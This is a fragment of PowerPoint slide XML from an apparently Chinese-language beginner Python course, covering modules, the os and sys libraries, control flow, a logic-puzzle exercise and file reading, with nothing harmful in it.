                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>):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g = 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while x &gt; 0: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	g = x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	x = y % x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	y = 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dirty="0">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 return g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469466" y="1142172"/>
            <a:ext cx="5423014" cy="3257308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="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r>
              <a:rPr lang="en-US" altLang="zh-CN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mport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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endParaRPr lang="en-US" altLang="zh-TW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import numbers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numbers.calc</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW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r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW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zh-TW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numbers.divide</a:t>
            </a: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(42,5)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kumimoji="0" lang="en-US" altLang="zh-TW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calc</a:t>
            </a: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(123, 456)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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="50000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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__import__()</a:t>
            </a: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动态载入模块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一个模块只载入一次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实例会继承新加载的模块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</a:pP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sys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等价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sys = __import__('sys')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51234"/>
            <a:ext cx="856895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dirty="0"/>
              <a:t>程序可分成好几个模块：一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件就是一个模块，目录下面增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>__init__.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也是。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500"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFF5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721" r="9136" b="27320"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7658693" y="3498797"/>
            <a:ext cx="1186017" cy="1186016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="13 CuadroTexto"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7699251" y="482304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4225" y="182386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特点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9552" y="708801"/>
            <a:ext cx="38539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开源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免费，可以获取源码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脚本语言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解释型语言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没有编译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连接，直接运行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面向对象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作者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Guido van Rossum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第一版发布与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Feb 1991 0.9.0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当前版本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2.7.13/3.6.1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不兼容性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1999" y="798596"/>
            <a:ext cx="39604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优雅设计紧凑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内存自动处理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跨平台，不依赖特定操作系统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标准库丰富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大量第三方组件模块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胶水语言可以与外部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c/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代码整合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易上手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易上手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易上手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!!!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72112" y="4018977"/>
            <a:ext cx="4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ea typeface="华文隶书" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/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568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4367" y="48103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4AEDA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>30</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="14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07699" y="1271192"/>
            <a:ext cx="5577154" cy="36002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分类：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、自定义模块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自定义模块，就是自己写的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文件为了实现某个功能。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、内置标准模块（又称标准库）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内置模块，就是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自身已经写好的某个功能，例如经常用的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等模块都是内置模块。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、开源模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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开源模块，别人写好的不收费模块，一般也称第三方模块。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/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模块的引用：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modules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modules import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类</a:t>
            </a:r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、如果有多个模块，可以用逗号隔开，如果想把某个模块里面的所有功能都导入，可以用*，这样的话功能都加载道内存里面，占用内存资源，不建议用。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595189"/>
            <a:ext cx="8568952" cy="545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是由很多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组成，来实现某种功能，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由函数和类组成。库是抽象概念，也可以是各种模块组成。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1" t="4640" r="33200" b="4640"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2346781">
            <a:off x="3024866" y="265465"/>
            <a:ext cx="63585" cy="230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85" y="2211710"/>
            <a:ext cx="1428750" cy="1647825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="云形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5972690" y="1248197"/>
            <a:ext cx="2016224" cy="1368152"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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8200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噢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200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,python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200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就是各种模块的使用，可以闪了。。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3530" y="154543"/>
            <a:ext cx="2666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Modules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与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84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51520" y="161343"/>
            <a:ext cx="21563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程序组织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679085"/>
            <a:ext cx="292564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__init__.py</a:t>
            </a:r>
          </a:p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InitMain.py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subPack1/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mod11.py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mod12.py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mod13.py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subPack2/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mod21.py</a:t>
            </a:r>
            <a:b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mod22.py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mod23.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a: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12" y="1869711"/>
            <a:ext cx="3709965" cy="10655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95313"/>
            <a:ext cx="3728423" cy="1181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44" y="3032388"/>
            <a:ext cx="3709963" cy="1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5505" y="165091"/>
            <a:ext cx="3224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与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__all__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搭配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3824"/>
            <a:ext cx="4171950" cy="408975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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="614063"/>
            <a:ext cx="3888074" cy="17598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38197"/>
            <a:ext cx="3888074" cy="22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2764" y="482304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9867" y="167087"/>
            <a:ext cx="3219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常用模块之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0032" y="1044071"/>
            <a:ext cx="38164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os.path.split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('path')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返回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元组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os.path.splitext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返回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(filename, extension)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元组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os.path.getatime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mtime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分别返回最近访问、创建、修改时间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os.path.getsize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返回文件大小</a:t>
            </a:r>
          </a:p>
          <a:p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os.path.exists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是否存在</a:t>
            </a:r>
          </a:p>
          <a:p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os.path.isabs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是否为绝对路径</a:t>
            </a:r>
          </a:p>
          <a:p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os.path.isdir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是否为目录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os.path.isfile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是否为文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357981" y="992714"/>
            <a:ext cx="43580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('path/filename')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删除文件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os.rename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重命名文件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生成目录树下的所有文件名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os.chdir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改变目录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os.mkdir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makedirs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创建目录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多层目录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os.rmdir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removedirs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删除目录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多层目录</a:t>
            </a:r>
          </a:p>
          <a:p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列出指定目录的文件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os.getcwd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取得当前工作目录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os.chmod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改变目录权限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os.path.basename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('path/filename')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去掉目录路径，返回文件名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os.path.dirname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('path/filename') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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去掉文件名，返回目录路径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(path1[,path2[,...]])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将分离的各部分组合成一个路径名</a:t>
            </a:r>
          </a:p>
          <a:p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355" y="618242"/>
            <a:ext cx="560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模块提供了一种方便的使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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 tooltip="操作系统知识库"/>
              </a:rPr>
              <a:t>操作系统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函数的方法。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9867" y="167087"/>
            <a:ext cx="3219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常用模块之 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SYS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4860032" y="1025611"/>
            <a:ext cx="38164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sys.stdout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标准输出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sys.stdin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标准输入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sys.stderr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错误输出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sys.exc_clear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用来清除当前线程所出现的当前的或最近的错误信息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sys.exec_prefix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返回平台独立的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文件安装的位置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sys.byteorder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本地字节规则的指示器，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big-endian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平台的值是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'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big',little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-endian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平台的值是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'little'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sys.copyright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记录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版权相关的东西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sys.api_version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解释器的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API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版本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sys.stdin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sys.stdout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sys.stderr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981" y="994650"/>
            <a:ext cx="43580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8200"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sys.argv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命令行参数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List,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第一个元素是程序本身路径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sys.modules.keys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返回所有已经导入的模块列表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sys.exc_info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()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获取当前正在处理的异常类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exc_type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exc_value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exc_traceback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当前处理的异常详细信息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sys.exit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(n)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退出程序，正常退出时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exit(0)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sys.hexversion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获取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解释程序的版本值，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进制格式如：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0x020403F0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sys.version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获取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解释程序的版本信息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sys.maxint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最大的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值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sys.maxunicode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最大的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Unicode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值</a:t>
            </a:r>
          </a:p>
          <a:p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sys.modules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返回系统导入的模块字段，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是模块名，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value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是模块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sys.path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返回模块的搜索路径，初始化时使用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PYTHONPATH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环境变量的值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sys.platform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0082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返回操作系统平台名称</a:t>
            </a:r>
          </a:p>
          <a:p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7981" y="618242"/>
            <a:ext cx="798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模块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提供访问由解释器使用或维护的变量和与解释器进行交互的函数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250291"/>
            <a:ext cx="7632848" cy="310644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if	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for	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break continue pass	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while	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+mn-lt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try except</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	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神奇的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>yield	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="+mn-lt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84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基本流程控制语句</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226293" y="595313"/>
            <a:ext cx="6858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Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中常用流程控制语句：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27689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950" y="637954"/>
            <a:ext cx="8229600" cy="842083"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断条件可不用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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，条件和语句后面都带有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if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287" y="1155949"/>
            <a:ext cx="1992853" cy="285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3002" rIns="9144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判断条件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执行语句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6666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判断条件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执行语句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判断条件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执行语句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执行语句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05876" y="1109783"/>
            <a:ext cx="3960440" cy="29481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# -*- coding: utf-8 -*-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import sys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reload(sys); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1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sys.setdefaultencoding</a:t>
            </a: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 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1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gbk</a:t>
            </a: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" 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input(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birth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Year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birth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=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int(s)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if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birth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&lt;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2000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00前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l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if</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1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B05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birth &gt;2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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endParaRPr lang="en-US" altLang="zh-CN" sz="14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00后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else </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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lang="zh-CN" altLang="zh-CN" sz="14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00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="14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中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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lang="zh-CN" altLang="zh-CN" sz="14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400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400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886096" y="3442426"/>
            <a:ext cx="2490382" cy="612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880000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/C++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>X&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Y:X:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"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+mn-ea"/>
              </a:rPr>
              <a:t>python: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X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if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X&lt;Y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else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Y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ea"/>
              </a:rPr>
              <a:t> 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+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="云形标注 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6515348" y="2499742"/>
            <a:ext cx="1813502" cy="72008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PYTHONINC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52120" y="4055056"/>
            <a:ext cx="3119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ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=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a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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a&gt;b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>else </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a-b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+1440</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12219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E181C0-725A-4AF5-A5AA-E83A0046F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8" y="2244449"/>
            <a:ext cx="4120701" cy="2264933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(1,11)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print(sum)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TW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(names)):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1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 names[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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TW" sz="16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6F96A20-2D13-4C4C-818A-863A4F8C1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84625"/>
            <a:ext cx="4320480" cy="1624757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999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2A4772A-8C3A-4282-857D-697691179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90" y="1027740"/>
            <a:ext cx="4124149" cy="88609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en-US" altLang="zh-CN" sz="16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print(name)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217D07C-D796-48A1-AFE9-802854385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402" y="1027740"/>
            <a:ext cx="4320480" cy="162475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sz="1600" dirty="0" err="1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85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k, v in my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sz="1600" dirty="0" err="1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ict.items</a:t>
            </a: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k=='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1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</a:t>
            </a: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continue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 k, v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4CC7EE-E1E9-4A8D-97F6-D61534635487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234862" y="610192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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1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start,stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1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 step])</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40404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5951"/>
            <a:ext cx="2989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列表的穷举小应用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368060" y="771550"/>
            <a:ext cx="8336122" cy="2031325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抓了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a, b, c, d 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>名犯罪嫌疑人，其中有一名是小偷，审讯中：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  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说我不是小偷 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2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说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是小偷</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  3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说小偷肯定是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>d  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  4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d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>说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胡说！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其中有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个人说的是实话，一个人说的是假话。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推断谁是小偷？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AADE07-BE28-4B5F-BB53-80F8A42CC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13" y="3066405"/>
            <a:ext cx="8388424" cy="12161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 thief in [ 'a', 'b', 'c', 'd' ]:</a:t>
            </a:r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sum =(thief != 'a')+(thief == 'c')+(thief == 'd')+(thief !='d')</a:t>
            </a:r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if sum == 3:</a:t>
            </a:r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小偷是：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%s " % thief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39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文件读写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FD39326-C5D9-485E-8486-75ECB8C5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61" y="714348"/>
            <a:ext cx="2003925" cy="1224648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f1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= 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for line in f1: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print line,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333333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l1, l2, l3, l4=open("Chinglish.txt")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l1, l2, l3, l4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A55183B-D55A-4EF0-8198-B7C82B37A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762" y="1982357"/>
            <a:ext cx="2311340" cy="924566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输出结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008200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good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="10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good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study day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="10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day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up.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no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="10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zuo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no die why you try?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don't ask why, just do it!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no try no high, let it go!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5752E50-FFFE-4C3D-8A0F-36475DAFF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46" y="3618923"/>
            <a:ext cx="6029137" cy="562928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['good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good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study day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day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up.\n', 'no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zuo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no die why you try?\n', "don't ask why, just do it!\n", 'no try no high, let it go!']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['good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good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study day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day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up.\n', 'no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zuo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no die why you try?\n', "don't ask why, just do it!\n", 'no try no high, let it go!']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(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'good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good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study day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day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up.\n', 'no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900" dirty="0" err="1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zuo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9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no die why you try?\n', "don't ask why, just do it!\n", 'no try no high, let it go!'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900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BC29D22-0E28-4826-8236-1F0CE300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3" y="3360912"/>
            <a:ext cx="1816193" cy="1070760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f5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= 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f5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000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.readlines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333333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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1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list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(open("Chinglish.txt"))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333333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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1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tuple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(open('Chinglish.txt'))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E40DB8D-FD84-4E86-BE1C-7E3A3AC5D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619" y="721303"/>
            <a:ext cx="2312483" cy="916871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f2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= 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000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f2.next(),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f2.next(),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f2.next(),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f2.next()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3747372-82C2-4BEB-9602-F04B0B4C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035" y="720878"/>
            <a:ext cx="1800200" cy="916871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f3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= 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200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f3.readline(),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f3.readline(),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f3.readline(),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f3.readline()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489737-1577-4DE5-97CE-87622B7D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50" y="2007241"/>
            <a:ext cx="2790825" cy="13144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493980A-7953-4453-B64B-5B52CFCE9CE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571214" y="1592607"/>
            <a:ext cx="416610" cy="23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801E37-AE02-4479-8446-FECFDB422320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4293861" y="1638174"/>
            <a:ext cx="571" cy="3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3DA4E81-E98A-434C-90D5-7407D65DFD4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5599897" y="1520124"/>
            <a:ext cx="360901" cy="33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D2909BE-FA01-4A85-B446-45FFAAA1CF3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267744" y="3896292"/>
            <a:ext cx="400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云形 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03C6474A-578D-4F20-9FB3-CBD4F2EE3F67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7479800" y="1712748"/>
            <a:ext cx="1440160" cy="64909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</a:rPr>
              <a:t>花样挺多！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3713DFF8-D23F-4E9B-AF13-D63E876D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12" y="2315101"/>
            <a:ext cx="1440160" cy="455206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f4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= open("Chinglish.txt")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 f4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000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read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000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9883D7-6257-488B-96DE-E8BFC950A231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2668045" y="2454115"/>
            <a:ext cx="333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8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4225" y="182386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应用领域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6570" y="600076"/>
            <a:ext cx="53975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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>电信基础设施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Twilio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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>支付系统 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(PayPal, Balanced Payments)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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>神经科学和心理学 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>许多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>许多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>例子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>数值分析和工程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numpy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numba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>以及 更多其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>动画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LucasArts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
